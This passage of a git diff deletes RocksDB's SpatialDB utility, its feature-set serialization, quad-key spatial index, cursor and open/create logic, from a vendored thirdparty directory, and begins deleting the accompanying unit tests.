-#include "rocksdb/slice_transform.h"
-#include "rocksdb/statistics.h"
-#include "rocksdb/table.h"
-#include "rocksdb/db.h"
-#include "rocksdb/utilities/stackable_db.h"
-#include "util/coding.h"
-#include "utilities/spatialdb/utils.h"
-#include "port/port.h"
-
-namespace rocksdb {
-namespace spatial {
-
-// Column families are used to store element's data and spatial indexes. We use
-// [default] column family to store the element data. This is the format of
-// [default] column family:
-// * id (fixed 64 big endian) -> blob (length prefixed slice) feature_set
-// (serialized)
-// We have one additional column family for each spatial index. The name of the
-// column family is [spatial$<spatial_index_name>]. The format is:
-// * quad_key (fixed 64 bit big endian) id (fixed 64 bit big endian) -> ""
-// We store information about indexes in [metadata] column family. Format is:
-// * spatial$<spatial_index_name> -> bbox (4 double encodings) tile_bits
-// (varint32)
-
-namespace {
-const std::string kMetadataColumnFamilyName("metadata");
-inline std::string GetSpatialIndexColumnFamilyName(
-    const std::string& spatial_index_name) {
-  return "spatial$" + spatial_index_name;
-}
-inline bool GetSpatialIndexName(const std::string& column_family_name,
-                                Slice* dst) {
-  *dst = Slice(column_family_name);
-  if (dst->starts_with("spatial$")) {
-    dst->remove_prefix(8);  // strlen("spatial$")
-    return true;
-  }
-  return false;
-}
-
-}  // namespace
-
-void Variant::Init(const Variant& v, Data& d) {
-  switch (v.type_) {
-    case kNull:
-      break;
-    case kBool:
-      d.b = v.data_.b;
-      break;
-    case kInt:
-      d.i = v.data_.i;
-      break;
-    case kDouble:
-      d.d = v.data_.d;
-      break;
-    case kString:
-      new (d.s) std::string(*GetStringPtr(v.data_));
-      break;
-    default:
-      assert(false);
-  }
-}
-
-Variant& Variant::operator=(const Variant& v) {
-  // Construct first a temp so exception from a string ctor
-  // does not change this object
-  Data tmp;
-  Init(v, tmp);
-
-  Type thisType = type_;
-  // Boils down to copying bits so safe
-  std::swap(tmp, data_);
-  type_ = v.type_;
-
-  Destroy(thisType, tmp);
-
-  return *this;
-}
-
-Variant& Variant::operator=(Variant&& rhs) {
-  Destroy(type_, data_);
-  if (rhs.type_ == kString) {
-    new (data_.s) std::string(std::move(*GetStringPtr(rhs.data_)));
-  } else {
-    data_ = rhs.data_;
-  }
-  type_ = rhs.type_;
-  rhs.type_ = kNull;
-  return *this;
-}
-
-bool Variant::operator==(const Variant& rhs) const {
-  if (type_ != rhs.type_) {
-    return false;
-  }
-
-  switch (type_) {
-    case kNull:
-      return true;
-    case kBool:
-      return data_.b == rhs.data_.b;
-    case kInt:
-      return data_.i == rhs.data_.i;
-    case kDouble:
-      return data_.d == rhs.data_.d;
-    case kString:
-      return *GetStringPtr(data_) == *GetStringPtr(rhs.data_);
-    default:
-      assert(false);
-  }
-  // it will never reach here, but otherwise the compiler complains
-  return false;
-}
-
-FeatureSet* FeatureSet::Set(const std::string& key, const Variant& value) {
-  map_.insert({key, value});
-  return this;
-}
-
-bool FeatureSet::Contains(const std::string& key) const {
-  return map_.find(key) != map_.end();
-}
-
-const Variant& FeatureSet::Get(const std::string& key) const {
-  auto itr = map_.find(key);
-  assert(itr != map_.end());
-  return itr->second;
-}
-
-FeatureSet::iterator FeatureSet::Find(const std::string& key) const {
-  return iterator(map_.find(key));
-}
-
-void FeatureSet::Clear() { map_.clear(); }
-
-void FeatureSet::Serialize(std::string* output) const {
-  for (const auto& iter : map_) {
-    PutLengthPrefixedSlice(output, iter.first);
-    output->push_back(static_cast<char>(iter.second.type()));
-    switch (iter.second.type()) {
-      case Variant::kNull:
-        break;
-      case Variant::kBool:
-        output->push_back(static_cast<char>(iter.second.get_bool()));
-        break;
-      case Variant::kInt:
-        PutVarint64(output, iter.second.get_int());
-        break;
-      case Variant::kDouble: {
-        PutDouble(output, iter.second.get_double());
-        break;
-      }
-      case Variant::kString:
-        PutLengthPrefixedSlice(output, iter.second.get_string());
-        break;
-      default:
-        assert(false);
-    }
-  }
-}
-
-bool FeatureSet::Deserialize(const Slice& input) {
-  assert(map_.empty());
-  Slice s(input);
-  while (s.size()) {
-    Slice key;
-    if (!GetLengthPrefixedSlice(&s, &key) || s.size() == 0) {
-      return false;
-    }
-    char type = s[0];
-    s.remove_prefix(1);
-    switch (type) {
-      case Variant::kNull: {
-        map_.insert({key.ToString(), Variant()});
-        break;
-      }
-      case Variant::kBool: {
-        if (s.size() == 0) {
-          return false;
-        }
-        map_.insert({key.ToString(), Variant(static_cast<bool>(s[0]))});
-        s.remove_prefix(1);
-        break;
-      }
-      case Variant::kInt: {
-        uint64_t v;
-        if (!GetVarint64(&s, &v)) {
-          return false;
-        }
-        map_.insert({key.ToString(), Variant(v)});
-        break;
-      }
-      case Variant::kDouble: {
-        double d;
-        if (!GetDouble(&s, &d)) {
-          return false;
-        }
-        map_.insert({key.ToString(), Variant(d)});
-        break;
-      }
-      case Variant::kString: {
-        Slice str;
-        if (!GetLengthPrefixedSlice(&s, &str)) {
-          return false;
-        }
-        map_.insert({key.ToString(), str.ToString()});
-        break;
-      }
-      default:
-        return false;
-    }
-  }
-  return true;
-}
-
-std::string FeatureSet::DebugString() const {
-  std::string out = "{";
-  bool comma = false;
-  for (const auto& iter : map_) {
-    if (comma) {
-      out.append(", ");
-    } else {
-      comma = true;
-    }
-    out.append("\"" + iter.first + "\": ");
-    switch (iter.second.type()) {
-      case Variant::kNull:
-        out.append("null");
-        break;
-      case Variant::kBool:
-        if (iter.second.get_bool()) {
-          out.append("true");
-        } else {
-          out.append("false");
-        }
-        break;
-      case Variant::kInt: {
-        char buf[32];
-        snprintf(buf, sizeof(buf), "%" PRIu64, iter.second.get_int());
-        out.append(buf);
-        break;
-      }
-      case Variant::kDouble: {
-        char buf[32];
-        snprintf(buf, sizeof(buf), "%lf", iter.second.get_double());
-        out.append(buf);
-        break;
-      }
-      case Variant::kString:
-        out.append("\"" + iter.second.get_string() + "\"");
-        break;
-      default:
-        assert(false);
-    }
-  }
-  return out + "}";
-}
-
-class ValueGetter {
- public:
-  ValueGetter() {}
-  virtual ~ValueGetter() {}
-
-  virtual bool Get(uint64_t id) = 0;
-  virtual const Slice value() const = 0;
-
-  virtual Status status() const = 0;
-};
-
-class ValueGetterFromDB : public ValueGetter {
- public:
-  ValueGetterFromDB(DB* db, ColumnFamilyHandle* cf) : db_(db), cf_(cf) {}
-
-  virtual bool Get(uint64_t id) override {
-    std::string encoded_id;
-    PutFixed64BigEndian(&encoded_id, id);
-    status_ = db_->Get(ReadOptions(), cf_, encoded_id, &value_);
-    if (status_.IsNotFound()) {
-      status_ = Status::Corruption("Index inconsistency");
-      return false;
-    }
-
-    return true;
-  }
-
-  virtual const Slice value() const override { return value_; }
-
-  virtual Status status() const override { return status_; }
-
- private:
-  std::string value_;
-  DB* db_;
-  ColumnFamilyHandle* cf_;
-  Status status_;
-};
-
-class ValueGetterFromIterator : public ValueGetter {
- public:
-  explicit ValueGetterFromIterator(Iterator* iterator) : iterator_(iterator) {}
-
-  virtual bool Get(uint64_t id) override {
-    std::string encoded_id;
-    PutFixed64BigEndian(&encoded_id, id);
-    iterator_->Seek(encoded_id);
-
-    if (!iterator_->Valid() || iterator_->key() != Slice(encoded_id)) {
-      status_ = Status::Corruption("Index inconsistency");
-      return false;
-    }
-
-    return true;
-  }
-
-  virtual const Slice value() const override { return iterator_->value(); }
-
-  virtual Status status() const override { return status_; }
-
- private:
-  std::unique_ptr<Iterator> iterator_;
-  Status status_;
-};
-
-class SpatialIndexCursor : public Cursor {
- public:
-  // tile_box is inclusive
-  SpatialIndexCursor(Iterator* spatial_iterator, ValueGetter* value_getter,
-                     const BoundingBox<uint64_t>& tile_bbox, uint32_t tile_bits)
-      : value_getter_(value_getter), valid_(true) {
-    // calculate quad keys we'll need to query
-    std::vector<uint64_t> quad_keys;
-    quad_keys.reserve((tile_bbox.max_x - tile_bbox.min_x + 1) *
-                      (tile_bbox.max_y - tile_bbox.min_y + 1));
-    for (uint64_t x = tile_bbox.min_x; x <= tile_bbox.max_x; ++x) {
-      for (uint64_t y = tile_bbox.min_y; y <= tile_bbox.max_y; ++y) {
-        quad_keys.push_back(GetQuadKeyFromTile(x, y, tile_bits));
-      }
-    }
-    std::sort(quad_keys.begin(), quad_keys.end());
-
-    // load primary key ids for all quad keys
-    for (auto quad_key : quad_keys) {
-      std::string encoded_quad_key;
-      PutFixed64BigEndian(&encoded_quad_key, quad_key);
-      Slice slice_quad_key(encoded_quad_key);
-
-      // If CheckQuadKey is true, there is no need to reseek, since
-      // spatial_iterator is already pointing at the correct quad key. This is
-      // an optimization.
-      if (!CheckQuadKey(spatial_iterator, slice_quad_key)) {
-        spatial_iterator->Seek(slice_quad_key);
-      }
-
-      while (CheckQuadKey(spatial_iterator, slice_quad_key)) {
-        // extract ID from spatial_iterator
-        uint64_t id;
-        bool ok = GetFixed64BigEndian(
-            Slice(spatial_iterator->key().data() + sizeof(uint64_t),
-                  sizeof(uint64_t)),
-            &id);
-        if (!ok) {
-          valid_ = false;
-          status_ = Status::Corruption("Spatial index corruption");
-          break;
-        }
-        primary_key_ids_.insert(id);
-        spatial_iterator->Next();
-      }
-    }
-
-    if (!spatial_iterator->status().ok()) {
-      status_ = spatial_iterator->status();
-      valid_ = false;
-    }
-    delete spatial_iterator;
-
-    valid_ = valid_ && !primary_key_ids_.empty();
-
-    if (valid_) {
-      primary_keys_iterator_ = primary_key_ids_.begin();
-      ExtractData();
-    }
-  }
-
-  virtual bool Valid() const override { return valid_; }
-
-  virtual void Next() override {
-    assert(valid_);
-
-    ++primary_keys_iterator_;
-    if (primary_keys_iterator_ == primary_key_ids_.end()) {
-      valid_ = false;
-      return;
-    }
-
-    ExtractData();
-  }
-
-  virtual const Slice blob() override { return current_blob_; }
-  virtual const FeatureSet& feature_set() override {
-    return current_feature_set_;
-  }
-
-  virtual Status status() const override {
-    if (!status_.ok()) {
-      return status_;
-    }
-    return value_getter_->status();
-  }
-
- private:
-  // * returns true if spatial iterator is on the current quad key and all is
-  // well
-  // * returns false if spatial iterator is not on current, or iterator is
-  // invalid or corruption
-  bool CheckQuadKey(Iterator* spatial_iterator, const Slice& quad_key) {
-    if (!spatial_iterator->Valid()) {
-      return false;
-    }
-    if (spatial_iterator->key().size() != 2 * sizeof(uint64_t)) {
-      status_ = Status::Corruption("Invalid spatial index key");
-      valid_ = false;
-      return false;
-    }
-    Slice spatial_iterator_quad_key(spatial_iterator->key().data(),
-                                    sizeof(uint64_t));
-    if (spatial_iterator_quad_key != quad_key) {
-      // caller needs to reseek
-      return false;
-    }
-    // if we come to here, we have found the quad key
-    return true;
-  }
-
-  void ExtractData() {
-    assert(valid_);
-    valid_ = value_getter_->Get(*primary_keys_iterator_);
-
-    if (valid_) {
-      Slice data = value_getter_->value();
-      current_feature_set_.Clear();
-      if (!GetLengthPrefixedSlice(&data, &current_blob_) ||
-          !current_feature_set_.Deserialize(data)) {
-        status_ = Status::Corruption("Primary key column family corruption");
-        valid_ = false;
-      }
-    }
-
-  }
-
-  unique_ptr<ValueGetter> value_getter_;
-  bool valid_;
-  Status status_;
-
-  FeatureSet current_feature_set_;
-  Slice current_blob_;
-
-  // This is loaded from spatial iterator.
-  std::unordered_set<uint64_t> primary_key_ids_;
-  std::unordered_set<uint64_t>::iterator primary_keys_iterator_;
-};
-
-class ErrorCursor : public Cursor {
- public:
-  explicit ErrorCursor(Status s) : s_(s) { assert(!s.ok()); }
-  virtual Status status() const override { return s_; }
-  virtual bool Valid() const override { return false; }
-  virtual void Next() override { assert(false); }
-
-  virtual const Slice blob() override {
-    assert(false);
-    return Slice();
-  }
-  virtual const FeatureSet& feature_set() override {
-    assert(false);
-    // compiler complains otherwise
-    return trash_;
-  }
-
- private:
-  Status s_;
-  FeatureSet trash_;
-};
-
-class SpatialDBImpl : public SpatialDB {
- public:
-  // * db -- base DB that needs to be forwarded to StackableDB
-  // * data_column_family -- column family used to store the data
-  // * spatial_indexes -- a list of spatial indexes together with column
-  // families that correspond to those spatial indexes
-  // * next_id -- next ID in auto-incrementing ID. This is usually
-  // `max_id_currenty_in_db + 1`
-  SpatialDBImpl(
-      DB* db, ColumnFamilyHandle* data_column_family,
-      const std::vector<std::pair<SpatialIndexOptions, ColumnFamilyHandle*>>&
-          spatial_indexes,
-      uint64_t next_id, bool read_only)
-      : SpatialDB(db),
-        data_column_family_(data_column_family),
-        next_id_(next_id),
-        read_only_(read_only) {
-    for (const auto& index : spatial_indexes) {
-      name_to_index_.insert(
-          {index.first.name, IndexColumnFamily(index.first, index.second)});
-    }
-  }
-
-  ~SpatialDBImpl() {
-    for (auto& iter : name_to_index_) {
-      delete iter.second.column_family;
-    }
-    delete data_column_family_;
-  }
-
-  virtual Status Insert(
-      const WriteOptions& write_options, const BoundingBox<double>& bbox,
-      const Slice& blob, const FeatureSet& feature_set,
-      const std::vector<std::string>& spatial_indexes) override {
-    WriteBatch batch;
-
-    if (spatial_indexes.size() == 0) {
-      return Status::InvalidArgument("Spatial indexes can't be empty");
-    }
-
-    const size_t kWriteOutEveryBytes = 1024 * 1024;  // 1MB
-    uint64_t id = next_id_.fetch_add(1);
-
-    for (const auto& si : spatial_indexes) {
-      auto itr = name_to_index_.find(si);
-      if (itr == name_to_index_.end()) {
-        return Status::InvalidArgument("Can't find index " + si);
-      }
-      const auto& spatial_index = itr->second.index;
-      if (!spatial_index.bbox.Intersects(bbox)) {
-        continue;
-      }
-      BoundingBox<uint64_t> tile_bbox = GetTileBoundingBox(spatial_index, bbox);
-
-      for (uint64_t x = tile_bbox.min_x; x <= tile_bbox.max_x; ++x) {
-        for (uint64_t y = tile_bbox.min_y; y <= tile_bbox.max_y; ++y) {
-          // see above for format
-          std::string key;
-          PutFixed64BigEndian(
-              &key, GetQuadKeyFromTile(x, y, spatial_index.tile_bits));
-          PutFixed64BigEndian(&key, id);
-          batch.Put(itr->second.column_family, key, Slice());
-          if (batch.GetDataSize() >= kWriteOutEveryBytes) {
-            Status s = Write(write_options, &batch);
-            batch.Clear();
-            if (!s.ok()) {
-              return s;
-            }
-          }
-        }
-      }
-    }
-
-    // see above for format
-    std::string data_key;
-    PutFixed64BigEndian(&data_key, id);
-    std::string data_value;
-    PutLengthPrefixedSlice(&data_value, blob);
-    feature_set.Serialize(&data_value);
-    batch.Put(data_column_family_, data_key, data_value);
-
-    return Write(write_options, &batch);
-  }
-
-  virtual Status Compact(int num_threads) override {
-    std::vector<ColumnFamilyHandle*> column_families;
-    column_families.push_back(data_column_family_);
-
-    for (auto& iter : name_to_index_) {
-      column_families.push_back(iter.second.column_family);
-    }
-
-    std::mutex state_mutex;
-    std::condition_variable cv;
-    Status s;
-    int threads_running = 0;
-
-    std::vector<port::Thread> threads;
-
-    for (auto cfh : column_families) {
-      threads.emplace_back([&, cfh] {
-          {
-            std::unique_lock<std::mutex> lk(state_mutex);
-            cv.wait(lk, [&] { return threads_running < num_threads; });
-            threads_running++;
-          }
-
-          Status t = Flush(FlushOptions(), cfh);
-          if (t.ok()) {
-            t = CompactRange(CompactRangeOptions(), cfh, nullptr, nullptr);
-          }
-
-          {
-            std::unique_lock<std::mutex> lk(state_mutex);
-            threads_running--;
-            if (s.ok() && !t.ok()) {
-              s = t;
-            }
-            cv.notify_one();
-          }
-      });
-    }
-
-    for (auto& t : threads) {
-      t.join();
-    }
-
-    return s;
-  }
-
-  virtual Cursor* Query(const ReadOptions& read_options,
-                        const BoundingBox<double>& bbox,
-                        const std::string& spatial_index) override {
-    auto itr = name_to_index_.find(spatial_index);
-    if (itr == name_to_index_.end()) {
-      return new ErrorCursor(Status::InvalidArgument(
-          "Spatial index " + spatial_index + " not found"));
-    }
-    const auto& si = itr->second.index;
-    Iterator* spatial_iterator;
-    ValueGetter* value_getter;
-
-    if (read_only_) {
-      spatial_iterator = NewIterator(read_options, itr->second.column_family);
-      value_getter = new ValueGetterFromDB(this, data_column_family_);
-    } else {
-      std::vector<Iterator*> iterators;
-      Status s = NewIterators(read_options,
-                              {data_column_family_, itr->second.column_family},
-                              &iterators);
-      if (!s.ok()) {
-        return new ErrorCursor(s);
-      }
-
-      spatial_iterator = iterators[1];
-      value_getter = new ValueGetterFromIterator(iterators[0]);
-    }
-    return new SpatialIndexCursor(spatial_iterator, value_getter,
-                                  GetTileBoundingBox(si, bbox), si.tile_bits);
-  }
-
- private:
-  ColumnFamilyHandle* data_column_family_;
-  struct IndexColumnFamily {
-    SpatialIndexOptions index;
-    ColumnFamilyHandle* column_family;
-    IndexColumnFamily(const SpatialIndexOptions& _index,
-                      ColumnFamilyHandle* _cf)
-        : index(_index), column_family(_cf) {}
-  };
-  // constant after construction!
-  std::unordered_map<std::string, IndexColumnFamily> name_to_index_;
-
-  std::atomic<uint64_t> next_id_;
-  bool read_only_;
-};
-
-namespace {
-DBOptions GetDBOptionsFromSpatialDBOptions(const SpatialDBOptions& options) {
-  DBOptions db_options;
-  db_options.max_open_files = 50000;
-  db_options.max_background_compactions = 3 * options.num_threads / 4;
-  db_options.max_background_flushes =
-      options.num_threads - db_options.max_background_compactions;
-  db_options.env->SetBackgroundThreads(db_options.max_background_compactions,
-                                       Env::LOW);
-  db_options.env->SetBackgroundThreads(db_options.max_background_flushes,
-                                       Env::HIGH);
-  db_options.statistics = CreateDBStatistics();
-  if (options.bulk_load) {
-    db_options.stats_dump_period_sec = 600;
-  } else {
-    db_options.stats_dump_period_sec = 1800;  // 30min
-  }
-  return db_options;
-}
-
-ColumnFamilyOptions GetColumnFamilyOptions(const SpatialDBOptions& options,
-                                           std::shared_ptr<Cache> block_cache) {
-  ColumnFamilyOptions column_family_options;
-  column_family_options.write_buffer_size = 128 * 1024 * 1024;  // 128MB
-  column_family_options.max_write_buffer_number = 4;
-  column_family_options.max_bytes_for_level_base = 256 * 1024 * 1024;  // 256MB
-  column_family_options.target_file_size_base = 64 * 1024 * 1024;      // 64MB
-  column_family_options.level0_file_num_compaction_trigger = 2;
-  column_family_options.level0_slowdown_writes_trigger = 16;
-  column_family_options.level0_stop_writes_trigger = 32;
-  // only compress levels >= 2
-  column_family_options.compression_per_level.resize(
-      column_family_options.num_levels);
-  for (int i = 0; i < column_family_options.num_levels; ++i) {
-    if (i < 2) {
-      column_family_options.compression_per_level[i] = kNoCompression;
-    } else {
-      column_family_options.compression_per_level[i] = kLZ4Compression;
-    }
-  }
-  BlockBasedTableOptions table_options;
-  table_options.block_cache = block_cache;
-  column_family_options.table_factory.reset(
-      NewBlockBasedTableFactory(table_options));
-  return column_family_options;
-}
-
-ColumnFamilyOptions OptimizeOptionsForDataColumnFamily(
-    ColumnFamilyOptions options, std::shared_ptr<Cache> block_cache) {
-  options.prefix_extractor.reset(NewNoopTransform());
-  BlockBasedTableOptions block_based_options;
-  block_based_options.index_type = BlockBasedTableOptions::kHashSearch;
-  block_based_options.block_cache = block_cache;
-  options.table_factory.reset(NewBlockBasedTableFactory(block_based_options));
-  return options;
-}
-
-}  // namespace
-
-class MetadataStorage {
- public:
-  MetadataStorage(DB* db, ColumnFamilyHandle* cf) : db_(db), cf_(cf) {}
-  ~MetadataStorage() {}
-
-  // format: <min_x double> <min_y double> <max_x double> <max_y double>
-  // <tile_bits varint32>
-  Status AddIndex(const SpatialIndexOptions& index) {
-    std::string encoded_index;
-    PutDouble(&encoded_index, index.bbox.min_x);
-    PutDouble(&encoded_index, index.bbox.min_y);
-    PutDouble(&encoded_index, index.bbox.max_x);
-    PutDouble(&encoded_index, index.bbox.max_y);
-    PutVarint32(&encoded_index, index.tile_bits);
-    return db_->Put(WriteOptions(), cf_,
-                    GetSpatialIndexColumnFamilyName(index.name), encoded_index);
-  }
-
-  Status GetIndex(const std::string& name, SpatialIndexOptions* dst) {
-    std::string value;
-    Status s = db_->Get(ReadOptions(), cf_,
-                        GetSpatialIndexColumnFamilyName(name), &value);
-    if (!s.ok()) {
-      return s;
-    }
-    dst->name = name;
-    Slice encoded_index(value);
-    bool ok = GetDouble(&encoded_index, &(dst->bbox.min_x));
-    ok = ok && GetDouble(&encoded_index, &(dst->bbox.min_y));
-    ok = ok && GetDouble(&encoded_index, &(dst->bbox.max_x));
-    ok = ok && GetDouble(&encoded_index, &(dst->bbox.max_y));
-    ok = ok && GetVarint32(&encoded_index, &(dst->tile_bits));
-    return ok ? Status::OK() : Status::Corruption("Index encoding corrupted");
-  }
-
- private:
-  DB* db_;
-  ColumnFamilyHandle* cf_;
-};
-
-Status SpatialDB::Create(
-    const SpatialDBOptions& options, const std::string& name,
-    const std::vector<SpatialIndexOptions>& spatial_indexes) {
-  DBOptions db_options = GetDBOptionsFromSpatialDBOptions(options);
-  db_options.create_if_missing = true;
-  db_options.create_missing_column_families = true;
-  db_options.error_if_exists = true;
-
-  auto block_cache = NewLRUCache(options.cache_size);
-  ColumnFamilyOptions column_family_options =
-      GetColumnFamilyOptions(options, block_cache);
-
-  std::vector<ColumnFamilyDescriptor> column_families;
-  column_families.push_back(ColumnFamilyDescriptor(
-      kDefaultColumnFamilyName,
-      OptimizeOptionsForDataColumnFamily(column_family_options, block_cache)));
-  column_families.push_back(
-      ColumnFamilyDescriptor(kMetadataColumnFamilyName, column_family_options));
-
-  for (const auto& index : spatial_indexes) {
-    column_families.emplace_back(GetSpatialIndexColumnFamilyName(index.name),
-                                 column_family_options);
-  }
-
-  std::vector<ColumnFamilyHandle*> handles;
-  DB* base_db;
-  Status s = DB::Open(db_options, name, column_families, &handles, &base_db);
-  if (!s.ok()) {
-    return s;
-  }
-  MetadataStorage metadata(base_db, handles[1]);
-  for (const auto& index : spatial_indexes) {
-    s = metadata.AddIndex(index);
-    if (!s.ok()) {
-      break;
-    }
-  }
-
-  for (auto h : handles) {
-    delete h;
-  }
-  delete base_db;
-
-  return s;
-}
-
-Status SpatialDB::Open(const SpatialDBOptions& options, const std::string& name,
-                       SpatialDB** db, bool read_only) {
-  DBOptions db_options = GetDBOptionsFromSpatialDBOptions(options);
-  auto block_cache = NewLRUCache(options.cache_size);
-  ColumnFamilyOptions column_family_options =
-      GetColumnFamilyOptions(options, block_cache);
-
-  Status s;
-  std::vector<std::string> existing_column_families;
-  std::vector<std::string> spatial_indexes;
-  s = DB::ListColumnFamilies(db_options, name, &existing_column_families);
-  if (!s.ok()) {
-    return s;
-  }
-  for (const auto& cf_name : existing_column_families) {
-    Slice spatial_index;
-    if (GetSpatialIndexName(cf_name, &spatial_index)) {
-      spatial_indexes.emplace_back(spatial_index.data(), spatial_index.size());
-    }
-  }
-
-  std::vector<ColumnFamilyDescriptor> column_families;
-  column_families.push_back(ColumnFamilyDescriptor(
-      kDefaultColumnFamilyName,
-      OptimizeOptionsForDataColumnFamily(column_family_options, block_cache)));
-  column_families.push_back(
-      ColumnFamilyDescriptor(kMetadataColumnFamilyName, column_family_options));
-
-  for (const auto& index : spatial_indexes) {
-    column_families.emplace_back(GetSpatialIndexColumnFamilyName(index),
-                                 column_family_options);
-  }
-  std::vector<ColumnFamilyHandle*> handles;
-  DB* base_db;
-  if (read_only) {
-    s = DB::OpenForReadOnly(db_options, name, column_families, &handles,
-                            &base_db);
-  } else {
-    s = DB::Open(db_options, name, column_families, &handles, &base_db);
-  }
-  if (!s.ok()) {
-    return s;
-  }
-
-  MetadataStorage metadata(base_db, handles[1]);
-
-  std::vector<std::pair<SpatialIndexOptions, ColumnFamilyHandle*>> index_cf;
-  assert(handles.size() == spatial_indexes.size() + 2);
-  for (size_t i = 0; i < spatial_indexes.size(); ++i) {
-    SpatialIndexOptions index_options;
-    s = metadata.GetIndex(spatial_indexes[i], &index_options);
-    if (!s.ok()) {
-      break;
-    }
-    index_cf.emplace_back(index_options, handles[i + 2]);
-  }
-  uint64_t next_id = 1;
-  if (s.ok()) {
-    // find next_id
-    Iterator* iter = base_db->NewIterator(ReadOptions(), handles[0]);
-    iter->SeekToLast();
-    if (iter->Valid()) {
-      uint64_t last_id = 0;
-      if (!GetFixed64BigEndian(iter->key(), &last_id)) {
-        s = Status::Corruption("Invalid key in data column family");
-      } else {
-        next_id = last_id + 1;
-      }
-    }
-    delete iter;
-  }
-  if (!s.ok()) {
-    for (auto h : handles) {
-      delete h;
-    }
-    delete base_db;
-    return s;
-  }
-
-  // I don't need metadata column family any more, so delete it
-  delete handles[1];
-  *db = new SpatialDBImpl(base_db, handles[0], index_cf, next_id, read_only);
-  return Status::OK();
-}
-
-}  // namespace spatial
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/spatialdb/spatial_db_test.cc b/thirdparty/rocksdb/utilities/spatialdb/spatial_db_test.cc
deleted file mode 100644
index 7e0d674..0000000
--- a/thirdparty/rocksdb/utilities/spatialdb/spatial_db_test.cc
+++ /dev/null
@@ -1,307 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <vector>
-#include <string>
-#include <set>
-
-#include "rocksdb/utilities/spatial_db.h"
-#include "util/compression.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "util/random.h"
-
-namespace rocksdb {
-namespace spatial {
-
-class SpatialDBTest : public testing::Test {
- public:
-  SpatialDBTest() {
-    dbname_ = test::TmpDir() + "/spatial_db_test";
-    DestroyDB(dbname_, Options());
-  }
-
-  void AssertCursorResults(BoundingBox<double> bbox, const std::string& index,
-                           const std::vector<std::string>& blobs) {
-    Cursor* c = db_->Query(ReadOptions(), bbox, index);
-    ASSERT_OK(c->status());
-    std::multiset<std::string> b;
-    for (auto x : blobs) {
-      b.insert(x);
-    }
-
-    while (c->Valid()) {
-      auto itr = b.find(c->blob().ToString());
-      ASSERT_TRUE(itr != b.end());
-      b.erase(itr);
-      c->Next();
-    }
-    ASSERT_EQ(b.size(), 0U);
-    ASSERT_OK(c->status());
-    delete c;
-  }
-
-  std::string dbname_;
-  SpatialDB* db_;
-};
-
-TEST_F(SpatialDBTest, FeatureSetSerializeTest) {
-  if (!LZ4_Supported()) {
-    return;
-  }
-  FeatureSet fs;
-
-  fs.Set("a", std::string("b"));
-  fs.Set("x", static_cast<uint64_t>(3));
-  fs.Set("y", false);
-  fs.Set("n", Variant());  // null
-  fs.Set("m", 3.25);
-
-  ASSERT_TRUE(fs.Find("w") == fs.end());
-  ASSERT_TRUE(fs.Find("x") != fs.end());
-  ASSERT_TRUE((*fs.Find("x")).second == Variant(static_cast<uint64_t>(3)));
-  ASSERT_TRUE((*fs.Find("y")).second != Variant(true));
-  std::set<std::string> keys({"a", "x", "y", "n", "m"});
-  for (const auto& x : fs) {
-    ASSERT_TRUE(keys.find(x.first) != keys.end());
-    keys.erase(x.first);
-  }
-  ASSERT_EQ(keys.size(), 0U);
-
-  std::string serialized;
-  fs.Serialize(&serialized);
-
-  FeatureSet deserialized;
-  ASSERT_TRUE(deserialized.Deserialize(serialized));
-
-  ASSERT_TRUE(deserialized.Contains("a"));
-  ASSERT_EQ(deserialized.Get("a").type(), Variant::kString);
-  ASSERT_EQ(deserialized.Get("a").get_string(), "b");
-  ASSERT_TRUE(deserialized.Contains("x"));
-  ASSERT_EQ(deserialized.Get("x").type(), Variant::kInt);
-  ASSERT_EQ(deserialized.Get("x").get_int(), static_cast<uint64_t>(3));
-  ASSERT_TRUE(deserialized.Contains("y"));
-  ASSERT_EQ(deserialized.Get("y").type(), Variant::kBool);
-  ASSERT_EQ(deserialized.Get("y").get_bool(), false);
-  ASSERT_TRUE(deserialized.Contains("n"));
-  ASSERT_EQ(deserialized.Get("n").type(), Variant::kNull);
-  ASSERT_TRUE(deserialized.Contains("m"));
-  ASSERT_EQ(deserialized.Get("m").type(), Variant::kDouble);
-  ASSERT_EQ(deserialized.Get("m").get_double(), 3.25);
-
-  // corrupted serialization
-  serialized = serialized.substr(0, serialized.size() - 4);
-  deserialized.Clear();
-  ASSERT_TRUE(!deserialized.Deserialize(serialized));
-}
-
-TEST_F(SpatialDBTest, TestNextID) {
-  if (!LZ4_Supported()) {
-    return;
-  }
-  ASSERT_OK(SpatialDB::Create(
-      SpatialDBOptions(), dbname_,
-      {SpatialIndexOptions("simple", BoundingBox<double>(0, 0, 100, 100), 2)}));
-
-  ASSERT_OK(SpatialDB::Open(SpatialDBOptions(), dbname_, &db_));
-  ASSERT_OK(db_->Insert(WriteOptions(), BoundingBox<double>(5, 5, 10, 10),
-                        "one", FeatureSet(), {"simple"}));
-  ASSERT_OK(db_->Insert(WriteOptions(), BoundingBox<double>(10, 10, 15, 15),
-                        "two", FeatureSet(), {"simple"}));
-  delete db_;
-  db_ = nullptr;
-
-  ASSERT_OK(SpatialDB::Open(SpatialDBOptions(), dbname_, &db_));
-  assert(db_ != nullptr);
-  ASSERT_OK(db_->Insert(WriteOptions(), BoundingBox<double>(55, 55, 65, 65),
-                        "three", FeatureSet(), {"simple"}));
-  delete db_;
-
-  ASSERT_OK(SpatialDB::Open(SpatialDBOptions(), dbname_, &db_));
-  AssertCursorResults(BoundingBox<double>(0, 0, 100, 100), "simple",
-                      {"one", "two", "three"});
-  delete db_;
-}
-
-TEST_F(SpatialDBTest, FeatureSetTest) {
-  if (!LZ4_Supported()) {
-    return;
-  }
-  ASSERT_OK(SpatialDB::Create(
-      SpatialDBOptions(), dbname_,
-      {SpatialIndexOptions("simple", BoundingBox<double>(0, 0, 100, 100), 2)}));
-  ASSERT_OK(SpatialDB::Open(SpatialDBOptions(), dbname_, &db_));
-
-  FeatureSet fs;
-  fs.Set("a", std::string("b"));
-  fs.Set("c", std::string("d"));
-
-  ASSERT_OK(db_->Insert(WriteOptions(), BoundingBox<double>(5, 5, 10, 10),
-                        "one", fs, {"simple"}));
-
-  Cursor* c =
-      db_->Query(ReadOptions(), BoundingBox<double>(5, 5, 10, 10), "simple");
